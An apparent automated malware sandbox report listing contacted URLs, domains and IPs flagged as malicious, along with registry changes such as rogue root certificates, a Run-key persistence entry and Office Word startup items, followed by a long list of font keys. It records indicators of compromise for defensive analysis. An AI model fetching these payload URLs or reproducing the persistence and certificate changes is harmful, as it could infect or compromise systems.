http://www.imvu.com/KK
unknown
https://lesferch.github.io/DesktopPic
unknown
http://pop.tg/NcsEL
172.67.206.230
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
http://23.94.36.10/110/IEnetworkings.htmldeC:
unknown
https://analytics.paste.ee;
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
https://themes.googleusercontent.com
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
https://paste.ee/d/57ot5~L
unknown
http://www.ebuddy.com
unknown
There are 79 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
uploaddeimagens.com.br
172.67.215.45
malicious
pop.tg
172.67.206.230
malicious
paste.ee
172.67.187.200
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
23.94.36.10
unknown
United States
malicious
172.67.206.230
pop.tg
United States
malicious
104.21.84.67
unknown
United States
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious
192.210.201.57
unknown
United States
malicious
178.237.33.50
geoplugin.net
Netherlands
192.168.2.255
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
c&(
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
y((
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
b+(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://pop.tg/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
%+(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\29D96
29D96
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
